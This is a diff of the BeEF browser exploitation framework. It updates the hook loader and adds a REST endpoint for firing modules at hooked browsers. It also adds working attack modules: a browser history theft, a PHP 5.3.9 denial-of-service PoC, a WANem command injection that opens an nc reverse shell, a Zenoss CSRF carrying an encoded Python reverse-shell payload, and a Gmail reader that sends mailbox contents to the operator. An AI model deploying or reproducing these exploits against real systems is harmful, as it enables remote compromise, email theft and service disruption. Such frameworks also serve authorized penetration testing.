print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end
end
}
if autorun.length > 0
print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end
}
if autorun.length > 0
print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
end
end

17
core/main/handlers/modules/beefjs.rb
View File

@@ -23,14 +23,16 @@ module BeEF
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
# @note BeEF libraries: need Eruby evaluation and obfuscation
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == false
# @note BeEF libraries: need Eruby evaluation and obfuscation #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
else #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
if config.get("beef.http.websocket.enable") == true
beef_js_sub_files << "websocket.js"
end
# @note antisnatchor: leave timeout.js as the last one!
beef_js_sub_files << "timeout.js"
ext_js_to_obfuscate = ''
ext_js_to_not_obfuscate = ''
@@ -69,6 +71,9 @@ module BeEF
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -84,7 +89,7 @@ module BeEF
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end

70
core/main/rest/handlers/modules.rb
View File

@@ -157,7 +157,8 @@ module BeEF
#
#@note Fire a new command module to multiple hooked browsers.
# Returns the command IDs of the launched modules, or 0 if firing got issues.
# Returns the command IDs of the launched module, or 0 if firing got issues.
#
# POST request body example (for modules that don't need parameters, just remove "mod_params")
# {
# "mod_id":1,
@@ -166,12 +167,15 @@ module BeEF
# },
# "hb_ids":[1,2]
# }
#
# response example: {"1":16,"2":17}
#
# curl example (alert module with custom text, 2 hooked browsers)):
#
#curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
#-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
#
post '/multi' do
post '/multi_browser' do
request.body.rewind
begin
body = JSON.parse request.body.read
@@ -204,6 +208,68 @@ module BeEF
error 400 # Bad Request
end
end
# @note Fire multiple command modules to a single hooked browser.
# Returns the command IDs of the launched modules, or 0 if firing got issues.
#
# POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
#{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
# "modules": [
# { # test_return_long_string module with custom input
# "mod_id":99,
# "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
# },
# { # prompt_dialog module with custom input
# "mod_id":116,
# "mod_input":[{"question":"hooked?"}]
# },
# { # alert_dialog module without input (using default input, if any)
# "mod_id":128,
# "mod_input":[]
# }
# ]
# }
# response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
#
# curl example (test_return_long_string and prompt_dialog module with custom inputs)):
#
#curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
# "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
# -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
#
post '/multi_module' do
request.body.rewind
begin
body = JSON.parse request.body.read
hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"])
error 401 unless hb != nil
results = Hash.new
if body["modules"] != nil
body["modules"].each{|mod|
mod_id = mod["mod_id"]
mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"]
if mod_k == nil
results[mod_id] = 0
next
else
mod_params = []
mod["mod_input"].each{|input|
input.each{|k,v|
mod_params.push({'name' => k, 'value' => v})
}
}
cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
results[mod_id] = cmd_id
end
}
end
results.to_json
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/modules/multi"
error 400 # Bad Request
end
end
end
end
end

51
modules/browser/avant_steal_history/command.js Normal file
View File

@@ -0,0 +1,51 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var avant_iframe = document.createElement("iframe");
//var avant_iframe = beef.dom.createInvisibleIframe();
avant_iframe.setAttribute('src', "browser:home");
avant_iframe.setAttribute('name','test2');
avant_iframe.setAttribute('width','0');
avant_iframe.setAttribute('heigth','0');
avant_iframe.setAttribute('scrolling','no');
document.body.appendChild(avant_iframe);
var vstr = {value: ""};
if(window['test2'].navigator) {
//This works if FF is the rendering engine
window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
}
else {
// this works if Chrome is the rendering engine
//window['test2'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
}
});

25
modules/browser/avant_steal_history/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
avant_steal_history:
enable: true
category: "Browser"
name: "Get Visited URLs (Avant Browser)"
description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
authors: ["Roberto Suggi Liverani"]
target:
working: ["ALL"]

33
modules/browser/avant_steal_history/module.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Avant_steal_history < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
return [
{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

16
modules/debug/test_cors_request/command.js Normal file
View File

@@ -0,0 +1,16 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var method = "<%= @method %>";
var url = "<%= @url %>";
var data = "<%= @data %>";
beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); });
});

28
modules/debug/test_cors_request/config.yaml Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_cors_request:
enable: true
category: "Debug"
name: "Test CORS Request"
description: "Test the beef.net.cors.request function by retrieving a URL."
authors: ["bcoles"]
target:
working: ["ALL"]
not_working:
IE:
min_ver: 6
max_ver: 7
O:
min_ver: 1
max_ver: 11
C:
min_ver: 1
max_ver: 2
S:
min_ver: 1
max_ver: 3

23
modules/debug/test_cors_request/module.rb Normal file
View File

@@ -0,0 +1,23 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_cors_request < BeEF::Core::Command
def post_execute
content = {}
content['response'] = @datastore['response']
save content
end
def self.options
return [
{'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
{'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' },
]
end
end

52
modules/exploits/php-5.3.9-dos/command.js Normal file
View File

@@ -0,0 +1,52 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
// PoC written by Paul Westin
// PoC ported to BeEF by bcoles
// Bug discovered by Stefan Esser (@i0n1c)
// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
// Generate 1000 normal keys and one array
function createEvilObj () {
var evil_obj = {};
for (var i = 0; i < 1001; i++) {
evil_obj[i] = 1;
}
evil_obj['kill[]'] = 'kill';
return evil_obj;
}
// Serialize Javascript object into POST data
function serializeObj (obj) {
var str = [];
for(var p in obj) {
str.push(p + "=" + obj[p]);
}
return str.join("&");
}
// Run attack
function attackSite (target_url) {
var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest();
xhr.open("POST", target_url, true);
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xhr.setRequestHeader('Content-Length', bad.length);
xhr.send(bad);
}
try {
attackSite("<%= @url %>");
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
} catch (e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
}
});

15
modules/exploits/php-5.3.9-dos/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
php_dos:
enable: true
category: "Exploits"
name: "PHP 5.3.9 DoS"
description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (<a href='http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830'>CVE-2012-0830</a>).<br/><br/>For more information, see <a href='http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/'>http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/</a>."
authors: ["bcoles", "Paul Westin", "Stefan Esser"]
target:
unknown: ["ALL"]

21
modules/exploits/php-5.3.9-dos/module.rb Normal file
View File

@@ -0,0 +1,21 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Php_dos < BeEF::Core::Command
def self.options
return [
{'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

24
modules/exploits/wanem_command_execution/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var wanem_iframe = beef.dom.createInvisibleIframe();
wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wanem_iframe);
}
setTimeout("cleanup()", 15000);
});

18
modules/exploits/wanem_command_execution/config.yaml Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
################################################################################
beef:
module:
wanem_command_execution:
enable: true
category: "Exploits"
name: "WAN Emulator Command Execution"
description: "Attempts to get a reverse root shell on a WAN Emulator server.<br/>Tested on version 2.3 however other versions are likely to be vulnerable."
authors: ["bcoles"]
target:
working: ["ALL"]

27
modules/exploits/wanem_command_execution/module.rb Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
################################################################################
class Wanem_command_execution < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = "#{configuration.get("beef.http.host")}"
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

34
modules/exploits/zenoss_3x_command_execution/command.js Normal file
View File

@@ -0,0 +1,34 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var user = '<%= @user %>';
var pass = '<%= @pass %>';
var target = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig'
// reverse python payload
var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22')
// send request
var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [
{'type':'hidden', 'name':'__ac_name', 'value':user},
{'type':'hidden', 'name':'__ac_password', 'value':pass},
{'type':'hidden', 'name':'daemon', 'value':payload}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
// clean up
cleanup = function() {
document.body.removeChild(zenoss_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
});

18
modules/exploits/zenoss_3x_command_execution/config.yaml Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
################################################################################
beef:
module:
zenoss_command_execution:
enable: true
category: "Exploits"
name: "Zenoss 3.x Command Execution"
description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required."
authors: ["bcoles"]
target:
working: ["ALL"]

29
modules/exploits/zenoss_3x_command_execution/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
################################################################################
class Zenoss_command_execution < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = "#{configuration.get("beef.http.host")}"
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
{ 'name' => 'user', 'ui_label' => 'Username', 'value' => 'admin'},
{ 'name' => 'pass', 'ui_label' => 'Password', 'value' => 'zenoss'},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

44
modules/misc/read_gmail/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var result;
try {
x = new XMLHttpRequest();
x.open('get', 'https://mail.google.com/mail/feed/atom', false);
x.send();
str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g;
var match;
while(match = re.exec(str)) {
x = new XMLHttpRequest();
x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false);
x.send();
result += x.responseText;
}
} catch(e) {
for(var n in e)
result+= n + " " + e[n] + "\n";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});

25
modules/misc/read_gmail/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
read_gmail:
enable: true
category: "Misc"
name: "Read Gmail"
description: "If we are able to run in the context of mail.google.com (either by SOP bypass or other issue) then lets go read some email, grabs unread message ids from gmails atom feed, then grabs conent of each message"
authors: ["mh"]
target:
user_notify: ['ALL']

26
modules/misc/read_gmail/module.rb Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Read_gmail < BeEF::Core::Command
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
save({'result' => @datastore['result']})
end
end

2
modules/persistence/iframe_above/command.js
View File

@@ -5,6 +5,6 @@
//
beef.execute(function() {
beef.session.persistent();
beef.dom.persistentIframe();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
});

2
modules/social_engineering/simple_hijacker/templates/credential.js
View File

File diff suppressed because one or more lines are too long